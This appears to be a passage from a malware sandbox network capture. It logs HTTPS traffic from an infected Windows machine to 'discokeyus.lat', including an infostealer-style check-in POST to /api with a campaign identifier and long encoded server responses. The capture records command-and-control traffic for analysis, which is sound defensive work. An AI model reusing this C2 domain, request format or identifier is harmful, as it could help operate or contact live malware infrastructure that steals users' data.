                                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=I330biRJac4%2FPNph5H9C1Wo2E%2BH2kfweGlnIjJSLKng7EtaVUWd278eFa0%2F256zr5ivPMenNnjzpQ3VyNIdrdKraAKhE2wLKHz20o0YQ5w0xvan%2B49GZEcMZ9FSg6SsXpzA4sAI%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            CF-RAY: 8f5ae6f7fbff8cba-EWR
                                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1976&min_rtt=1976&rtt_var=742&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2842&recv_bytes=1041&delivery_rate=1472516&cwnd=218&unsent_bytes=0&cid=950ae8d1cdebc6dd&ts=786&x=0"
                                                                                                                                                                                                                                                            2024-12-21 21:18:01 UTC239INData Raw: 31 63 61 39 0d 0a 47 44 46 78 56 54 70 69 39 63 6b 74 6d 63 46 52 32 71 71 7a 7a 43 55 66 44 4e 56 68 73 74 58 4b 41 39 55 4d 76 6c 70 51 78 68 31 6a 45 77 64 33 41 46 62 5a 36 31 37 38 34 32 75 75 32 4d 61 70 43 54 31 74 73 55 4f 49 73 36 74 76 70 6d 6d 53 65 43 61 72 50 79 4a 58 45 44 6c 4a 42 39 6e 72 53 4f 48 6a 61 34 48 52 6b 61 6c 4c 50 54 62 33 42 4e 69 33 71 32 2b 33 62 64 55 31 49 4b 70 2b 63 46 30 57 50 56 38 42 6b 61 68 42 39 4b 51 30 76 38 76 5a 6f 6b 78 79 5a 4c 68 44 6e 76 65 76 65 66 63 32 6e 42 63 31 73 6e 78 56 55 41 49 2b 47 42 2f 5a 73 67 2f 38 72 33 50 67 69 4e 4b 70 52 33 4e 71 73 51 72 61 76 61 4a 6e 74 6d 6a 55 4b 6a 6d 67 64 58 42 54 46 54 78 56 43 49 57 6c 53 2f 4f 76 4d 72 58 4c 6b
                                                                                                                                                                                                                                                            Data Ascii: 1ca9GDFxVTpi9cktmcFR2qqzzCUfDNVhstXKA9UMvlpQxh1jEwd3AFbZ617842uu2MapCT1tsUOIs6tvpmmSeCarPyJXEDlJB9nrSOHja4HRkalLPTb3BNi3q2+3bdU1IKp+cF0WPV8BkahB9KQ0v8vZokxyZLhDnvevefc2nBc1snxVUAI+GB/Zsg/8r3PgiNKpR3NqsQravaJntmjUKjmgdXBTFTxVCIWlS/OvMrXLk
                                                                                                                                                                                                                                                            2024-12-21 21:18:01 UTC1369INData Raw: 65 41 48 65 6e 62 33 57 35 44 6b 6d 6d 4b 6d 66 38 6b 31 49 71 49 2f 5a 52 30 4b 64 31 38 4d 31 2f 4d 50 38 36 38 39 76 63 76 65 71 55 5a 39 66 4c 67 44 30 37 2b 67 5a 62 31 68 30 7a 63 38 72 6e 68 79 57 68 51 34 58 77 69 52 70 45 79 37 37 58 4f 2f 30 4a 48 32 42 31 31 2b 74 41 44 45 75 72 6b 68 71 43 44 46 65 44 57 6f 50 79 49 54 46 54 6c 5a 44 5a 65 35 52 2f 43 6f 4e 71 72 44 32 4b 4e 4b 66 57 4f 39 44 4e 4f 33 72 32 75 39 59 64 59 38 50 36 6c 35 65 6c 4e 54 65 52 67 48 6a 2b 73 58 75 34 41 32 71 4d 2f 64 75 41 56 48 4c 71 68 4e 79 66 65 76 62 66 63 32 6e 44 41 33 70 33 78 78 58 42 41 2f 55 78 4b 58 75 55 6e 32 70 69 47 2b 7a 64 2b 6b 52 47 39 6b 75 51 58 54 76 71 4e 6f 73 6d 6e 59 65 48 7a 6b 65 47 49 54 53 33 64 35 44 5a 79 6e 52 65 79 6a 63 36 65 47
                                                                                                                                                                                                                                                            Data Ascii: eAHenb3W5DkmmKmf8k1IqI/ZR0Kd18M1/MP8689vcveqUZ9fLgD07+gZb1h0zc8rnhyWhQ4XwiRpEy77XO/0JH2B11+tADEurkhqCDFeDWoPyITFTlZDZe5R/CoNqrD2KNKfWO9DNO3r2u9YdY8P6l5elNTeRgHj+sXu4A2qM/duAVHLqhNyfevbfc2nDA3p3xxXBA/UxKXuUn2piG+zd+kRG9kuQXTvqNosmnYeHzkeGITS3d5DZynReyjc6eG
                                                                                                                                                                                                                                                            2024-12-21 21:18:01 UTC1369INData Raw: 39 69 76 51 58 66 75 71 51 68 2b 53 37 62 49 48 4c 38 50 31 42 51 42 7a 52 53 51 71 4b 6f 51 66 57 6b 4a 66 6a 58 6e 37 63 48 65 6d 4c 33 57 35 43 36 71 57 6d 78 66 4e 4d 31 4d 61 70 78 64 56 59 63 50 31 67 41 6d 71 35 4c 38 4b 67 77 74 63 7a 44 70 45 64 31 61 37 59 4a 32 76 66 6d 49 62 42 32 6e 47 42 79 6c 57 68 78 45 53 59 30 56 67 36 51 76 51 2f 6b 37 53 72 34 7a 39 33 75 48 7a 31 6a 76 77 62 56 75 4b 6c 72 75 57 76 57 4e 44 71 71 66 47 68 63 46 7a 64 55 43 4a 32 6d 51 66 2b 72 4f 72 50 44 31 36 35 47 64 79 37 35 51 39 65 76 36 44 6e 33 57 74 73 30 50 36 73 39 54 31 41 64 4f 56 38 57 31 37 51 42 34 75 4d 30 74 49 69 4a 37 6b 74 30 62 72 77 4a 31 4c 65 76 62 4c 4a 74 32 7a 73 2f 6f 33 56 30 56 42 63 37 55 51 32 52 71 30 6a 2f 70 69 47 39 77 64 32 69 42
                                                                                                                                                                                                                                                            Data Ascii: 9ivQXfuqQh+S7bIHL8P1BQBzRSQqKoQfWkJfjXn7cHemL3W5C6qWmxfNM1MapxdVYcP1gAmq5L8KgwtczDpEd1a7YJ2vfmIbB2nGBylWhxESY0Vg6QvQ/k7Sr4z93uHz1jvwbVuKlruWvWNDqqfGhcFzdUCJ2mQf+rOrPD165Gdy75Q9ev6Dn3Wts0P6s9T1AdOV8W17QB4uM0tIiJ7kt0brwJ1LevbLJt2zs/o3V0VBc7UQ2Rq0j/piG9wd2iB
                                                                                                                                                                                                                                                            2024-12-21 21:18:01 UTC1369INData Raw: 44 7a 2f 6d 78 49 62 42 69 6e 47 42 79 72 58 5a 6f 58 52 30 2b 56 51 61 66 72 45 48 32 71 44 57 7a 7a 39 61 6f 53 6e 56 6a 73 67 44 52 73 36 4a 7a 74 47 58 57 4e 54 6a 6b 4d 54 70 55 43 33 63 41 51 4c 43 6e 5a 75 75 34 49 61 36 49 7a 75 42 65 50 57 6d 37 51 34 6a 33 71 32 36 2b 59 64 51 77 50 61 74 37 64 46 55 56 4f 6c 30 50 6e 62 6c 48 39 61 34 34 74 38 50 44 72 6b 70 35 59 72 4d 4c 32 37 33 6f 4c 2f 64 70 78 48 68 71 35 45 70 33 58 42 4d 30 54 6b 43 49 35 56 61 37 70 44 2f 34 6b 4a 47 69 53 58 31 68 75 77 2f 62 76 36 6c 74 75 57 6e 5a 4d 54 71 73 62 58 74 58 47 7a 5a 57 44 35 61 76 53 76 36 6e 4e 4c 7a 4f 33 75 34 4a 50 57 6d 76 51 34 6a 33 68 30 61 43 4c 50 30 43 63 72 73 78 59 78 4d 55 4f 78 68 59 31 36 64 4d 39 36 73 38 76 73 48 64 70 45 35 32 59 72
                                                                                                                                                                                                                                                            Data Ascii: Dz/mxIbBinGByrXZoXR0+VQafrEH2qDWzz9aoSnVjsgDRs6JztGXWNTjkMTpUC3cAQLCnZuu4Ia6IzuBePWm7Q4j3q26+YdQwPat7dFUVOl0PnblH9a44t8PDrkp5YrML273oL/dpxHhq5Ep3XBM0TkCI5Va7pD/4kJGiSX1huw/bv6ltuWnZMTqsbXtXGzZWD5avSv6nNLzO3u4JPWmvQ4j3h0aCLP0CcrsxYxMUOxhY16dM96s8vsHdpE52Yr
                                                                                                                                                                                                                                                            2024-12-21 21:18:01 UTC1369INData Raw: 72 47 53 34 62 39 30 2b 49 4b 4e 32 61 46 30 65 4f 46 41 49 6e 71 70 4c 2f 71 34 31 74 4d 4c 51 71 55 6c 7a 5a 76 64 4e 6b 4c 43 77 49 65 38 75 2f 53 67 70 74 6d 6c 33 63 68 34 34 47 42 2f 5a 73 67 2f 38 72 33 50 67 69 4e 69 38 51 33 42 38 76 67 54 65 75 4b 74 7a 74 6d 50 58 4b 6a 57 72 65 33 31 66 46 54 68 65 41 5a 4b 68 51 2f 79 6d 4f 4c 66 45 6b 65 41 48 65 6e 62 33 57 35 43 5a 6f 33 4b 67 62 64 49 7a 4a 4c 38 2f 5a 52 30 4b 64 31 38 4d 31 2f 4d 50 2b 4b 67 34 76 4d 6a 64 72 6b 4e 77 62 71 55 4d 31 37 43 68 61 71 56 6b 32 7a 38 35 72 48 52 31 56 51 45 37 56 68 4b 53 75 56 32 37 37 58 4f 2f 30 4a 48 32 42 30 74 70 70 78 50 54 39 5a 6c 33 74 48 6a 58 4e 54 37 6b 59 44 52 4b 55 7a 42 55 51 4d 2f 72 53 66 53 71 4d 4c 66 4a 32 4b 4a 4b 65 47 65 79 41 74 61
                                                                                                                                                                                                                                                            Data Ascii: rGS4b90+IKN2aF0eOFAInqpL/q41tMLQqUlzZvdNkLCwIe8u/Sgptml3ch44GB/Zsg/8r3PgiNi8Q3B8vgTeuKtztmPXKjWre31fFTheAZKhQ/ymOLfEkeAHenb3W5CZo3KgbdIzJL8/ZR0Kd18M1/MP+Kg4vMjdrkNwbqUM17ChaqVk2z85rHR1VQE7VhKSuV277XO/0JH2B0tppxPT9Zl3tHjXNT7kYDRKUzBUQM/rSfSqMLfJ2KJKeGeyAta
                                                                                                                                                                                                                                                            2024-12-21 21:18:01 UTC1369INData Raw: 57 33 48 65 43 33 71 5a 6a 70 55 48 33 63 41 51 4a 53 73 54 50 71 70 4f 72 54 48 31 71 70 56 64 32 6d 6c 41 74 47 38 70 57 32 33 59 39 45 79 4d 36 31 79 64 6c 34 55 4d 46 63 46 31 2b 55 50 2f 4c 74 7a 34 49 6a 77 6f 30 78 78 4e 65 31 44 7a 2f 6d 78 49 62 42 69 6e 47 42 79 70 48 56 2f 57 52 34 30 56 77 4f 46 71 6b 6e 70 6f 7a 36 79 32 74 75 6c 51 6e 42 6a 75 67 44 57 73 61 4e 74 70 57 66 63 4f 7a 6e 6b 4d 54 70 55 43 33 63 41 51 4c 53 38 57 66 47 6b 50 36 37 44 30 4b 31 52 63 48 37 33 54 5a 43 6d 72 33 44 33 4e 73 6f 6f 4a 61 4e 67 4e 45 70 54 4d 46 52 41 7a 2b 74 4a 38 71 55 30 76 73 62 44 71 30 46 79 59 62 34 4b 31 4c 2b 72 59 62 4e 71 32 7a 30 78 71 48 52 39 55 42 77 7a 55 51 36 65 70 41 2b 31 34 7a 53 67 69 49 6e 75 5a 6d 5a 74 75 77 36 51 71 4f 5a 34
                                                                                                                                                                                                                                                            Data Ascii: W3HeC3qZjpUH3cAQJSsTPqpOrTH1qpVd2mlAtG8pW23Y9EyM61ydl4UMFcF1+UP/Ltz4Ijwo0xxNe1Dz/mxIbBinGBypHV/WR40VwOFqknpoz6y2tulQnBjugDWsaNtpWfcOznkMTpUC3cAQLS8WfGkP67D0K1RcH73TZCmr3D3NsooJaNgNEpTMFRAz+tJ8qU0vsbDq0FyYb4K1L+rYbNq2z0xqHR9UBwzUQ6epA+14zSgiInuZmZtuw6QqOZ4
                                                                                                                                                                                                                                                            2024-12-21 21:18:01 UTC261INData Raw: 67 31 76 44 38 69 45 7a 4d 38 54 67 57 51 76 51 33 4f 6f 44 32 32 7a 38 66 75 57 45 49 67 39 77 7a 4b 39 2f 42 59 72 69 37 62 4e 48 4c 38 50 32 39 55 45 7a 42 43 46 70 43 6e 58 76 43 75 50 35 72 48 31 72 68 45 63 6d 32 6d 43 70 79 38 70 53 48 35 4c 74 73 67 63 76 77 2f 56 56 51 46 4e 48 63 44 68 71 49 50 74 65 4d 30 72 6f 69 4a 37 6e 6b 39 66 4c 51 54 30 37 69 35 58 2f 63 32 78 51 5a 79 72 32 6c 39 51 78 41 68 55 77 32 62 75 6e 47 37 2b 32 66 71 6d 6f 50 38 46 57 49 75 71 44 79 65 39 36 6b 68 37 31 66 46 65 43 54 6b 4a 79 67 64 55 79 55 59 57 4e 66 73 54 4f 6d 78 4e 62 76 65 30 75 6c 35 51 30 6d 68 43 64 65 6e 72 33 61 34 4c 70 4a 34 50 65 51 6e 51 78 4d 61 4d 45 4d 52 67 61 5a 66 2f 4f 4d 4d 39 6f 6a 4a 37 68 38 39 57 37 51 4e 33 72 43 2b 63 50 70 4a 79
                                                                                                                                                                                                                                                            Data Ascii: g1vD8iEzM8TgWQvQ3OoD22z8fuWEIg9wzK9/BYri7bNHL8P29UEzBCFpCnXvCuP5rH1rhEcm2mCpy8pSH5Ltsgcvw/VVQFNHcDhqIPteM0roiJ7nk9fLQT07i5X/c2xQZyr2l9QxAhUw2bunG7+2fqmoP8FWIuqDye96kh71fFeCTkJygdUyUYWNfsTOmxNbve0ul5Q0mhCdenr3a4LpJ4PeQnQxMaMEMRgaZf/OMM9ojJ7h89W7QN3rC+cPpJy
                                                                                                                                                                                                                                                            2024-12-21 21:18:01 UTC1369INData Raw: 32 63 37 33 0d 0a 48 68 74 58 46 4e 35 47 41 62 58 38 78 79 31 34 7a 65 70 69 49 6e 2b 46 53 59 37 35 46 53 41 35 62 63 76 72 69 37 4b 65 47 72 32 4d 54 70 42 55 32 38 59 52 35 53 35 58 66 32 67 4a 62 75 50 37 35 42 67 5a 32 4f 78 46 4d 47 4a 6c 6d 61 74 59 39 6f 76 49 2b 68 71 65 56 30 64 4d 45 35 41 32 65 74 41 75 2f 73 4b 2b 49 43 52 6b 51 6b 39 64 76 64 62 6b 49 4b 72 62 37 6c 70 79 69 6c 2f 67 32 56 33 56 51 51 6d 47 45 37 58 72 51 2b 6a 38 33 33 34 7a 4d 44 75 48 79 30 38 37 46 61 44 34 50 67 7a 71 43 44 46 65 43 54 6b 4a 79 67 64 55 79 55 59 57 4e 66 73 54 4f 6d 78 4e 62 76 65 30 75 6c 35 51 30 43 77 42 64 57 77 75 43 4f 5a 5a 63 67 2f 63 75 6f 2f 64 52 4e 4c 44 68 68 49 31 35 51 42 75 37 74 7a 34 49 6a 6b 72 55 6c 7a 61 61 45 53 6e 5a 6d 76 5a 37
                                                                                                                                                                                                                                                            Data Ascii: 2c73HhtXFN5GAbX8xy14zepiIn+FSY75FSA5bcvri7KeGr2MTpBU28YR5S5Xf2gJbuP75BgZ2OxFMGJlmatY9ovI+hqeV0dME5A2etAu/sK+ICRkQk9dvdbkIKrb7lpyil/g2V3VQQmGE7XrQ+j8334zMDuHy087FaD4PgzqCDFeCTkJygdUyUYWNfsTOmxNbve0ul5Q0CwBdWwuCOZZcg/cuo/dRNLDhhI15QBu7tz4IjkrUlzaaESnZmvZ7
                                                                                                                                                                                                                                                            2024-12-21 21:18:01 UTC1369INData Raw: 63 72 49 2f 49 67 46 64 64 30 70 41 7a 2b 73 49 2b 4c 45 68 76 73 76 48 72 51 42 44 55 4a 41 4e 31 37 61 2b 63 61 42 68 6b 78 59 45 68 55 46 45 52 68 41 35 56 67 65 42 75 67 2b 31 34 7a 7a 34 6b 4f 6a 75 44 7a 31 52 2b 55 50 49 39 2f 41 68 67 6d 33 53 4e 6a 57 79 62 6a 64 30 48 54 42 5a 46 6f 65 38 51 4c 53 4e 42 5a 6d 49 6e 2b 35 42 50 54 62 6c 54 5a 43 7a 75 53 48 76 50 6f 35 6a 5a 2f 63 6f 4b 67 45 4d 65 55 46 41 67 65 73 58 71 65 31 7a 71 6f 69 4a 37 67 42 2b 66 4b 55 46 30 36 47 72 4a 6f 6c 51 2b 7a 59 31 70 57 6c 71 58 68 38 57 57 78 47 64 6c 58 48 75 6f 44 32 32 7a 38 65 2f 42 7a 4d 75 75 45 4f 49 6a 75 67 70 39 31 47 53 65 43 72 6b 4a 7a 70 6d 45 44 6c 57 42 34 47 36 41 74 79 74 4e 4c 6e 65 77 61 4e 4c 58 47 32 6d 43 5a 44 35 36 47 66 33 4e 6f 35
                                                                                                                                                                                                                                                            Data Ascii: crI/IgFdd0pAz+sI+LEhvsvHrQBDUJAN17a+caBhkxYEhUFERhA5VgeBug+14zz4kOjuDz1R+UPI9/Ahgm3SNjWybjd0HTBZFoe8QLSNBZmIn+5BPTblTZCzuSHvPo5jZ/coKgEMeUFAgesXqe1zqoiJ7gB+fKUF06GrJolQ+zY1pWlqXh8WWxGdlXHuoD22z8e/BzMuuEOIjugp91GSeCrkJzpmEDlWB4G6AtytNLnewaNLXG2mCZD56Gf3No5


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                            50192.168.2.449928104.21.21.99443
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2024-12-21 21:18:02 UTC262OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                            Content-Length: 47
                                                                                                                                                                                                                                                            Host: discokeyus.lat
                                                                                                                                                                                                                                                            2024-12-21 21:18:02 UTC47OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 26 6a 3d
                                                                                                                                                                                                                                                            Data Ascii: act=recive_message&ver=4.0&lid=PsFKDg--pablo&j=
                                                                                                                                                                                                                                                            2024-12-21 21:18:02 UTC1119INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Sat, 21 Dec 2024 21:18:02 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Set-Cookie: PHPSESSID=bod2l8bn8gmlfn1teqqtqjcaqh; expires=Wed, 16 Apr 2025 15:04:41 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=876X1YrqdE7od7dY5TkEJqgsvdHlZPOBEkvzflZ5zEUZ512uUmNjBSQvvw52IzdGqFna3lrkUh53hON2i5YEXWrqf5pMhUfoZ0UIVjWlzlxZegmv26zDJ0elgxG2kOTmQg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            CF-RAY: 8f5ae7006bc9558a-EWR
                                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1517&min_rtt=1504&rtt_var=591&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2831&recv_bytes=945&delivery_rate=1811414&cwnd=252&unsent_bytes=0&cid=947e9938f8bdcd3c&ts=752&x=0"
                                                                                                                                                                                                                                                            2024-12-21 21:18:02 UTC250INData Raw: 34 36 61 0d 0a 61 6b 45 34 4e 31 63 54 68 79 71 66 65 39 49 64 6e 65 36 53 63 66 31 62 6c 36 48 45 7a 67 49 58 6c 52 56 51 6e 70 58 65 32 5a 63 52 59 30 34 56 62 53 65 72 43 4f 77 65 38 43 66 70 6e 4f 63 55 30 58 6e 32 78 65 62 30 5a 48 62 35 5a 6a 57 79 74 36 69 30 74 56 41 6e 57 56 73 6b 64 71 73 49 2b 67 50 77 4a 38 61 56 73 42 53 54 65 61 32 44 6f 61 52 67 64 76 6c 33 4d 66 58 36 72 72 58 30 41 69 31 66 58 7a 4a 77 34 30 76 7a 46 72 64 34 2b 49 2f 34 48 35 51 32 2f 38 7a 6d 34 69 42 79 37 7a 64 71 76 4e 69 37 72 66 59 6e 49 45 74 63 64 57 36 72 55 62 30 65 76 44 2b 6e 7a 50 4d 55 6e 7a 66 78 78 61 2b 6d 61 6e 2f 78 64 6a 54 30 35 62 65 2f 2f 77 49 6a 58 46 34 34 65 66 64 47 2b 52 47 38 66 76 4b 50 73 46 33 66 50 75 32 44 2f 75 77 7a 52
                                                                                                                                                                                                                                                            Data Ascii: 46aakE4N1cThyqfe9Idne6Scf1bl6HEzgIXlRVQnpXe2ZcRY04VbSerCOwe8CfpnOcU0Xn2xeb0ZHb5ZjWyt6i0tVAnWVskdqsI+gPwJ8aVsBSTea2DoaRgdvl3MfX6rrX0Ai1fXzJw40vzFrd4+I/4H5Q2/8zm4iBy7zdqvNi7rfYnIEtcdW6rUb0evD+nzPMUnzfxxa+man/xdjT05be//wIjXF44efdG+RG8fvKPsF3fPu2D/uwzR
                                                                                                                                                                                                                                                            2024-12-21 21:18:02 UTC887INData Raw: 2f 52 6d 49 2b 6e 36 72 4c 32 31 46 32 31 44 46 54 4a 39 70 52 43 39 45 62 78 78 2b 6f 2f 2f 46 4a 34 35 35 38 79 6d 72 32 68 39 38 33 30 39 38 2f 69 79 73 66 49 41 4b 6c 31 61 4d 6e 6e 6a 52 2f 35 5a 2f 6a 2f 34 6c 4c 42 4c 33 78 6e 6c 77 4b 57 34 62 57 53 33 61 48 7a 6c 74 37 75 33 74 56 42 6a 58 46 73 30 66 4f 56 61 39 52 4b 37 65 75 32 48 2b 52 36 53 4f 66 6a 4a 71 61 39 67 63 76 31 39 50 66 62 7a 73 62 62 7a 43 43 4d 61 47 33 56 32 2f 51 69 6c 57 5a 4e 36 37 34 76 38 42 64 30 44 74 64 7a 6f 74 53 42 79 2b 7a 64 71 76 50 2b 35 75 50 59 44 4c 46 6c 64 50 6d 50 6c 57 76 73 55 74 57 33 35 69 66 34 5a 6e 43 76 2f 7a 61 43 76 61 58 37 2b 63 6a 58 34 74 2f 4c 37 38 68 42 6a 41 68 55 55 66 4f 35 45 39 77 36 77 50 2b 44 43 36 56 4f 59 4e 62 57 62 35 71 68 68
                                                                                                                                                                                                                                                            Data Ascii: /RmI+n6rL21F21DFTJ9pRC9Ebxx+o//FJ4558ymr2h983098/iysfIAKl1aMnnjR/5Z/j/4lLBL3xnlwKW4bWS3aHzlt7u3tVBjXFs0fOVa9RK7eu2H+R6SOfjJqa9gcv19PfbzsbbzCCMaG3V2/QilWZN674v8Bd0DtdzotSBy+zdqvP+5uPYDLFldPmPlWvsUtW35if4ZnCv/zaCvaX7+cjX4t/L78hBjAhUUfO5E9w6wP+DC6VOYNbWb5qhh
                                                                                                                                                                                                                                                            2024-12-21 21:18:02 UTC1369INData Raw: 34 34 62 32 0d 0a 43 52 4e 2f 4c 56 35 72 4d 75 62 4c 64 77 50 72 79 76 2f 4c 54 36 42 79 74 61 56 44 46 38 34 55 6e 77 46 62 6c 38 38 34 44 34 48 70 4d 39 2b 73 75 75 72 32 68 6e 2b 58 6b 30 2b 76 65 35 2b 37 74 49 4a 45 49 56 62 54 48 42 52 75 6f 4e 75 7a 33 4b 6a 2f 34 64 6d 43 2b 31 33 4f 69 31 49 48 4c 37 4e 32 71 38 2b 62 47 77 2b 51 38 71 57 31 59 31 65 2b 74 48 39 78 47 34 66 2f 4b 4e 2b 78 75 5a 4e 50 37 4d 71 61 74 6f 64 76 74 79 50 2f 2b 33 38 76 76 79 45 47 4d 43 46 52 42 2f 35 6c 6e 73 57 34 56 38 38 59 4c 33 42 64 38 6d 75 39 72 6d 71 32 77 31 72 7a 63 34 2b 2f 43 34 74 76 38 4c 4a 31 35 59 4f 6e 6a 73 51 65 38 54 76 48 48 74 67 66 6f 57 6b 54 58 77 7a 4b 61 74 59 58 76 39 66 48 4b 79 74 37 75 6a 74 56 42 6a 64 56 67 6c 59 2b 39 44 37 46 75
                                                                                                                                                                                                                                                            Data Ascii: 44b2CRN/LV5rMubLdwPryv/LT6BytaVDF84UnwFbl884D4HpM9+suur2hn+Xk0+ve5+7tIJEIVbTHBRuoNuz3Kj/4dmC+13Oi1IHL7N2q8+bGw+Q8qW1Y1e+tH9xG4f/KN+xuZNP7MqatodvtyP/+38vvyEGMCFRB/5lnsW4V88YL3Bd8mu9rmq2w1rzc4+/C4tv8LJ15YOnjsQe8TvHHtgfoWkTXwzKatYXv9fHKyt7ujtVBjdVglY+9D7Fu
                                                                                                                                                                                                                                                            2024-12-21 21:18:02 UTC1369INData Raw: 4c 42 4c 33 78 62 32 31 61 7a 73 66 7a 76 75 4e 7a 58 77 74 2b 54 37 2f 77 51 6e 57 56 6b 38 66 65 68 4a 2b 52 36 39 65 2f 2b 4b 39 68 61 65 4d 76 33 50 71 61 5a 73 63 66 74 2b 4e 50 44 30 76 37 32 31 52 6d 4e 64 54 58 55 70 70 57 6e 77 45 72 78 2f 2f 4a 33 33 55 39 46 35 2b 38 57 6d 37 44 68 6a 35 32 41 31 34 37 6d 6c 2b 2f 49 45 59 77 49 56 50 32 50 67 52 76 6b 54 74 58 76 7a 68 76 41 57 6a 54 48 7a 78 4b 71 6b 5a 58 72 78 63 6a 2f 37 2f 4c 2b 70 35 77 73 6e 56 46 6c 31 50 36 56 50 35 56 6e 6f 50 39 71 62 38 77 4f 5a 4f 72 58 63 36 4c 55 67 63 76 73 33 61 72 7a 33 73 72 66 2b 44 79 68 52 55 54 46 78 36 45 50 7a 46 37 6c 7a 39 34 44 33 41 5a 49 38 2f 63 6d 76 71 57 78 34 39 47 55 78 2f 62 66 79 2b 2f 49 51 59 77 49 56 45 6b 4c 53 61 37 30 47 2f 6d 61 2f
                                                                                                                                                                                                                                                            Data Ascii: LBL3xb21azsfzvuNzXwt+T7/wQnWVk8fehJ+R69e/+K9haeMv3PqaZscft+NPD0v721RmNdTXUppWnwErx//J33U9F5+8Wm7Dhj52A147ml+/IEYwIVP2PgRvkTtXvzhvAWjTHzxKqkZXrxcj/7/L+p5wsnVFl1P6VP5VnoP9qb8wOZOrXc6LUgcvs3arz3srf+DyhRUTFx6EPzF7lz94D3AZI8/cmvqWx49GUx/bfy+/IQYwIVEkLSa70G/ma/
                                                                                                                                                                                                                                                            2024-12-21 21:18:02 UTC1369INData Raw: 64 35 32 63 43 70 70 79 42 71 75 57 35 79 2b 2f 76 38 34 37 55 50 4b 31 4a 62 4e 6e 66 75 52 50 45 59 75 58 6e 36 68 50 63 63 6d 44 44 79 77 36 43 2b 5a 33 6a 2b 64 7a 6e 31 2f 62 69 36 2f 6b 68 74 47 6c 49 74 4d 62 30 49 7a 78 36 6d 62 2f 7a 4d 37 31 32 47 65 66 4c 50 35 76 51 67 65 4f 56 32 4e 2b 37 7a 73 37 44 6e 41 79 56 61 55 43 64 32 36 55 4c 79 47 72 68 79 2f 49 54 69 45 35 49 35 35 39 47 67 70 32 34 31 75 54 63 31 35 4c 66 6b 2b 38 51 66 4b 42 70 4b 65 32 69 6c 54 2f 46 5a 36 44 2f 38 68 76 30 64 6a 54 33 7a 79 4b 57 69 61 48 44 2f 63 7a 6a 78 2b 4c 65 78 2f 41 41 6a 56 56 41 39 65 75 4e 47 2f 42 2b 38 63 72 2f 43 73 42 53 48 65 61 32 44 67 62 5a 74 63 2b 42 6d 42 2f 76 33 37 66 76 71 52 6a 6f 61 55 6a 6b 78 76 51 6a 77 46 62 70 79 2b 6f 6a 34 46
                                                                                                                                                                                                                                                            Data Ascii: d52cCppyBquW5y+/v847UPK1JbNnfuRPEYuXn6hPccmDDyw6C+Z3j+dzn1/bi6/khtGlItMb0Izx6mb/zM712GefLP5vQgeOV2N+7zs7DnAyVaUCd26ULyGrhy/ITiE5I559Ggp241uTc15Lfk+8QfKBpKe2ilT/FZ6D/8hv0djT3zyKWiaHD/czjx+Lex/AAjVVA9euNG/B+8cr/CsBSHea2DgbZtc+BmB/v37fvqRjoaUjkxvQjwFbpy+oj4F
